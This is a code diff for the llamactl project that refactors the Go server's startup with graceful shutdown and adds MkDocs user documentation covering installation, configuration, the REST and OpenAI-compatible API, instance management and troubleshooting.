+		if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
+			fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
+			fmt.Println("Instance logs will not be available.")
+		}
 	}

 	// Initialize the instance manager
-	instanceManager := llamactl.NewInstanceManager(config.Instances)
+	instanceManager := manager.NewInstanceManager(cfg.Instances)

 	// Create a new handler with the instance manager
-	handler := llamactl.NewHandler(instanceManager, config)
+	handler := server.NewHandler(instanceManager, cfg)

 	// Setup the router with the handler
-	r := llamactl.SetupRouter(handler)
+	r := server.SetupRouter(handler)

-	// Start the server with the router
-	fmt.Printf("Starting llamactl on port %d...\n", config.Server.Port)
-	http.ListenAndServe(fmt.Sprintf("%s:%d", config.Server.Host, config.Server.Port), r)
+	// Handle graceful shutdown
+	stop := make(chan os.Signal, 1)
+	signal.Notify(stop, os.Interrupt, syscall.SIGTERM)
+
+	server := http.Server{
+		Addr:    fmt.Sprintf("%s:%d", cfg.Server.Host, cfg.Server.Port),
+		Handler: r,
+	}
+
+	go func() {
+		fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
+		if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
+			fmt.Printf("Error starting server: %v\n", err)
+		}
+	}()
+
+	// Wait for shutdown signal
+	<-stop
+
+	fmt.Println("Shutting down server...")
+	if err := server.Close(); err != nil {
+		fmt.Printf("Error shutting down server: %v\n", err)
+	} else {
+		fmt.Println("Server shut down gracefully.")
+	}
+
+	// Wait for all instances to stop
+	instanceManager.Shutdown()
+
+	fmt.Println("Exiting llamactl.")
 }

docs-requirements.txt

@@ -0,0 +1,4 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4


@@ -0,0 +1,150 @@
# Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
llamactl works out of the box with sensible defaults, but you can customize the behavior to suit your needs.
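For example, a value set in the environment wins over the same value in a config file. A quick sketch using the documented `LLAMACTL_PORT` variable (port numbers are illustrative):
```bash
# llamactl.yaml sets port: 8080, but the environment variable takes precedence
LLAMACTL_PORT=9090 llamactl
```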
## Default Configuration
Here's the default configuration with all available options:
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/Library/Application Support/llamactl/config.yaml`
- `/Library/Application Support/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to the config file with the `LLAMACTL_CONFIG_PATH` environment variable.
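For example (the path is illustrative):
```bash
# Load the configuration from a custom location
LLAMACTL_CONFIG_PATH=/opt/llamactl/config.yaml llamactl
```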
## Configuration Options
### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
max_running_instances: -1 # Maximum running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_MAX_RUNNING_INSTANCES` - Maximum number of running instances
- `LLAMACTL_ENABLE_LRU_EVICTION` - Enable LRU eviction for idle instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
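As a sketch, overriding a few instance settings from the environment (values are illustrative):
```bash
export LLAMACTL_INSTANCE_PORT_RANGE="8000-9000"   # "8000,9000" also works
export LLAMACTL_MAX_RUNNING_INSTANCES=2
export LLAMACTL_LLAMA_EXECUTABLE=/usr/local/bin/llama-server
llamactl
```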
### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
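For example, a minimal sketch of supplying keys through the environment (the key values are placeholders):
```bash
export LLAMACTL_MANAGEMENT_KEYS="sk-management-key"
export LLAMACTL_INFERENCE_KEYS="sk-inference-key-1,sk-inference-key-2"
llamactl
```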
## Command Line Options
View all available command line options:
```bash
llamactl --help
```
You can also override configuration using command line flags when starting llamactl.


@@ -0,0 +1,70 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
**Quick install methods:**
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build llama.cpp from source - see the [llama.cpp repository](https://github.com/ggml-org/llama.cpp) for build instructions.
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
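Optionally, you can embed version information so that `llamactl --version` reports something more useful than `unknown`. This is a sketch based on the build-time variables in the server's main package; the version string is illustrative:
```bash
# Optional: embed version metadata via -ldflags
go build -ldflags "-X main.version=dev \
  -X main.commitHash=$(git rev-parse --short HEAD) \
  -X main.buildTime=$(date -u +%Y-%m-%dT%H:%M:%SZ)" \
  -o llamactl ./cmd/server
```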
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!


@@ -0,0 +1,143 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Log in with the management API key. By default, it is generated during server startup; copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Model Path**: Path to your Llama.cpp model file
- **Additional Options**: Any extra Llama.cpp parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configuration
Here's a basic example configuration for a Llama 2 model (when creating via the API, the instance name comes from the URL):
```json
{
  "backend_type": "llama_cpp",
  "backend_options": {
    "model": "/path/to/llama-2-7b-chat.gguf",
    "threads": 4,
    "ctx_size": 2048
  }
}
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/v1/instances

# Create a new instance named my-model
curl -X POST http://localhost:8080/api/v1/instances/my-model \
  -H "Content-Type: application/json" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/path/to/model.gguf"
    }
  }'

# Start an instance
curl -X POST http://localhost:8080/api/v1/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="not-needed" # Llamactl doesn't require API keys by default
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Learn how to manage instances in the [Managing Instances](../user-guide/managing-instances.md) guide
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

(new binary image, 69 KiB)

docs/images/dashboard.png (new binary image, 44 KiB)

docs/index.md

@@ -0,0 +1,41 @@
# Llamactl Documentation
Welcome to the Llamactl documentation! **Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
![Dashboard Screenshot](images/dashboard.png)
## What is Llamactl?
Llamactl is designed to simplify the deployment and management of llama-server instances. It provides a modern solution for running multiple large language models with centralized management.
## Features
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
## License
MIT License - see the [LICENSE](https://github.com/lordmathis/llamactl/blob/main/LICENSE) file.


@@ -0,0 +1,412 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/server/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/server/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/server/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "starting",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopping",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "restarting",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of lines to return (`-1` returns all lines; this is the default)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing model name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/models/llama-2-7b.gguf"
    }
  }'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.


@@ -0,0 +1,190 @@
# Managing Instances
Learn how to effectively manage your Llama.cpp instances with Llamactl through both the Web UI and API.
## Overview
Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
### Authentication
If authentication is enabled:
1. Navigate to the web UI
2. Enter your credentials
3. Bearer token is stored for the session
### Theme Support
- Switch between light and dark themes
- Setting is remembered across sessions
## Instance Cards
Each instance is displayed as a card showing:
- **Instance name**
- **Health status badge** (unknown, ready, error, failed)
- **Action buttons** (start, stop, edit, logs, delete)
## Create Instance
### Via Web UI
![Create Instance Screenshot](../images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
2. Enter a unique **Name** for your instance (only required field)
3. Configure model source (choose one):
- **Model Path**: Full path to your downloaded GGUF model file
- **HuggingFace Repo**: Repository name (e.g., `unsloth/gemma-3-27b-it-GGUF`)
- **HuggingFace File**: Specific file within the repo (optional, uses default if not specified)
4. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
5. Configure optional llama-server backend options:
- **Threads**: Number of CPU threads to use
- **Context Size**: Context window size (ctx_size)
- **GPU Layers**: Number of layers to offload to GPU
- **Port**: Network port (auto-assigned by llamactl if not specified)
- **Additional Parameters**: Any other llama-server command line options (see [llama-server documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/server/README.md))
6. Click **"Create"** to save the instance
### Via API
```bash
# Create instance with local model file
curl -X POST http://localhost:8080/api/v1/instances/my-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"threads": 8,
"ctx_size": 4096
}
}'
# Create instance with HuggingFace model
curl -X POST http://localhost:8080/api/v1/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
},
"auto_restart": true,
"max_restarts": 3
}'
```
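The optional instance management settings from the Web UI section can be set through the API as well; a sketch combining on-demand start with an idle timeout (field names follow the API schema above, values are illustrative):
```bash
# Create an instance that starts on demand and stops after 10 idle minutes
curl -X POST http://localhost:8080/api/v1/instances/on-demand-model \
  -H "Content-Type: application/json" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/path/to/model.gguf"
    },
    "on_demand_start": true,
    "idle_timeout": 10
  }'
```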
## Start Instance
### Via Web UI
1. Click the **"Start"** button on an instance card
2. Watch the status change to "Unknown"
3. Monitor progress in the logs
4. Instance status changes to "Ready" when ready
### Via API
```bash
curl -X POST http://localhost:8080/api/v1/instances/{name}/start
```
## Stop Instance
### Via Web UI
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
```bash
curl -X POST http://localhost:8080/api/v1/instances/{name}/stop
```
## Edit Instance
### Via Web UI
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/v1/instances/{name} \
-H "Content-Type: application/json" \
-d '{
"backend_options": {
"threads": 8,
"context_size": 4096
}
}'
```
!!! note
Configuration changes require restarting the instance to take effect.
## View Logs
### Via Web UI
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
Fetch the logs for an instance:
```bash
# Get instance logs
curl http://localhost:8080/api/v1/instances/{name}/logs
```
## Delete Instance
### Via Web UI
1. Click the **"Delete"** button on an instance card
2. Only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
```bash
curl -X DELETE http://localhost:8080/api/v1/instances/{name}
```
## Instance Proxy
Llamactl proxies all requests to the underlying llama-server instances.
```bash
# Proxy a request to the instance
curl http://localhost:8080/api/v1/instances/{name}/proxy/
```
Check llama-server [docs](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md) for more information.
### Instance Health
#### Via Web UI
1. The health status badge is displayed on each instance card
#### Via API
Check the health status of your instances:
```bash
curl http://localhost:8080/api/v1/instances/{name}/proxy/health
```


@@ -0,0 +1,160 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml-org/llama.cpp](https://github.com/ggml-org/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml-org/llama.cpp/issues](https://github.com/ggml-org/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml-org/llama.cpp/discussions](https://github.com/ggml-org/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

mkdocs.yml

@@ -0,0 +1,68 @@
site_name: Llamactl Documentation
site_description: User documentation for Llamactl - A management tool for Llama.cpp instances
site_author: Llamactl Team
site_url: https://llamactl.org
repo_name: lordmathis/llamactl
repo_url: https://github.com/lordmathis/llamactl
theme:
name: material
palette:
# Palette toggle for light mode
- scheme: default
primary: indigo
accent: indigo
toggle:
icon: material/brightness-7
name: Switch to dark mode
# Palette toggle for dark mode
- scheme: slate
primary: indigo
accent: indigo
toggle:
icon: material/brightness-4
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.top
- search.highlight
- search.share
- content.code.copy
markdown_extensions:
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- pymdownx.superfences
- admonition
- pymdownx.details
- pymdownx.tabbed:
alternate_style: true
- attr_list
- md_in_html
- toc:
permalink: true
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
plugins:
- search
- git-revision-date-localized
extra:
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl

pkg/backends/backend.go

@@ -0,0 +1,7 @@
package backends
type BackendType string
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
)


@@ -1,4 +1,4 @@
-package llamactl
+package llamacpp

 import (
 	"encoding/json"
@@ -15,12 +15,12 @@ type LlamaServerOptions struct {
 	CPUMask        string `json:"cpu_mask,omitempty"`
 	CPURange       string `json:"cpu_range,omitempty"`
 	CPUStrict      int    `json:"cpu_strict,omitempty"`
-	Priority       int    `json:"priority,omitempty"`
